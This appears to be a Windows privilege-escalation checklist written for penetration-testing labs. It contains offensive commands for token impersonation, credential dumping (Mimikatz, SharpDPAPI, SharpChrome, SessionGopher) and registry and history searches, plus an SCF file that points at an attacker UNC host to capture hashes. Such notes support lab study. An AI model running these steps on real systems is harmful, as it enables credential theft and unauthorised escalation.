📋Windows Privesc Checklist

Check for hidden files in powershell with ls -fo

Refer https://github.com/maksyche/pentest-everything/tree/master/enum_and_exploit/windows

Privileges, groups,etc

• Check permissions with whoami /priv and enable with FullPowers(nt authority/local system or Network service)

  • If in administrator group but still no access check UAC

  • SeBackupPrivilege

  • SeRestorePrivilege

  • SeImpersonatePrivilege ---> GodPotato, Potatoes

  • SeDebugPrivilege

  • SeEnableDelegationPrivilege

  • SeTakeOwnershipPrivilege

  • SeManageVolumePrivilege

  • SeLoadDriverPrivilege

  • SeMachineAccountPrivilege

• Check Group membership with whoami /groups

  • If in Print Operators group --> SeLoadDriverPrivilege

  • DnsAdmins group

  • Hyper-V Administrators group

  • Server Operators group

  • If in the 'Event Log Readers Group' then use

  wevtutil qe Security /rd:true /f:text /r:share01 /u:julie.clay /p:Welcome1 | findstr "/user"

  to view logs(can be used without creds). Can also use:

  Get-WinEvent -LogName security | where { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*'} | Select-Object @{name='CommandLine';expression={ $_.Properties[8].Value }}

• To check for GPO use Powerview

• Check for tokens with incognito

  • To list:.\incognito.exe list_tokens -u

  • To impersonate: .\incognito.exe execute -c "domain\user" C:\Windows\system32\cmd.exe

• To check environment variable: set. Check Path to execute

• View named pipes:

pipelist.exe /accepteula

Or in powershell:

gci \\.\pipe\

• To check DACLs of all named pipes

.\accesschk.exe /accepteula \pipe\

To check of a particular pipe:

accesschk.exe /accepteula \\.\Pipe\lsass -v

• If in Ad Recycle Bin group try:

Get-ADObject -SearchBase "CN=Deleted Objects,DC=Cascade,DC=Local" -Filter {ObjectClass -eq "user"} -IncludeDeletedObjects -Properties *

• If applocker is present place executable in C:\Windows\System32\spool\drivers\color

Mimikatz

Use mimikatz once Administrator access is gained. Multiple techniques are outlined in the Mimikatz page

SharpDPAPI

.\SharpDPAPI.exe machinecredentials

Common Vulnerabilities

• PrintNighmare

Social Engineering

• Make a scf or lnk file and put it in frequently accessed shares and start responder :)

scf file:

```
[Shell]
Command=2
IconFile=\\10.10.14.3\share\legit.ico
[Taskbar]
Command=ToggleDesktop
```

Programs & Services

• To check running services: tasklist /svc

• Check for Weak Permissions

• Check for Vulnerable Services

• Check for DLL Injection

• Applocker info :

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

• If Citrix try Citrix Breakout

• To get installed applications:

Remove "select displayname" to display all properties 32 bit:

Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname

64 bit:

Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname

Also check Program files directory and Downloads

• To get running processes: Get-Process

Network

• For arp cache: arp -a

• Network config: ipconfig /all

• Routing table:route

• For active ports that are listening: netstat -ano

  • Look for loopback addresses (127.0.0.1 and ::1) that are not listening on the IP Address (10.129.43.8) or broadcast (0.0.0.0, ::/0).The reason for this is network sockets on localhost are often insecure due to the thought that "they aren't accessible to the network."

Files & Creds (PuTTY,Autologon,etc)

• Credential Hunting

• Powershell

  To check if Script Block Logging or Powershell Transcription is turned on:

  Get-History

  Clear-History does not delete PSReadline

  (Get-PSReadlineOption).HistorySavePath

  Go to that path and check too.

  To display now:

  type C:\Users\dave\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

  type C:\Users\Public\Transcripts\transcript01.txt

• Check for stored credentials

cmdkey /list

If stored credentials present can run commands as other users:

PS C:\htb> runas /savecred /user:inlanefreight\bob "COMMAND HERE"

• Browser Credentials:

.\SharpChrome.exe logins /unprotect

• Use LaZagne for getting various credentials

• To look for saved PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP credentials:

Import-Module .\SessionGopher.ps1
Invoke-SessionGopher -Target WINLPE-SRV01
# Locally:
Invoke-SessionGopher -Thorough

• Clear text passwords in registry. Autologon:

  query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

  Putty: For sessions->

  reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions

  For keys and values of session:

  reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\kali%20ssh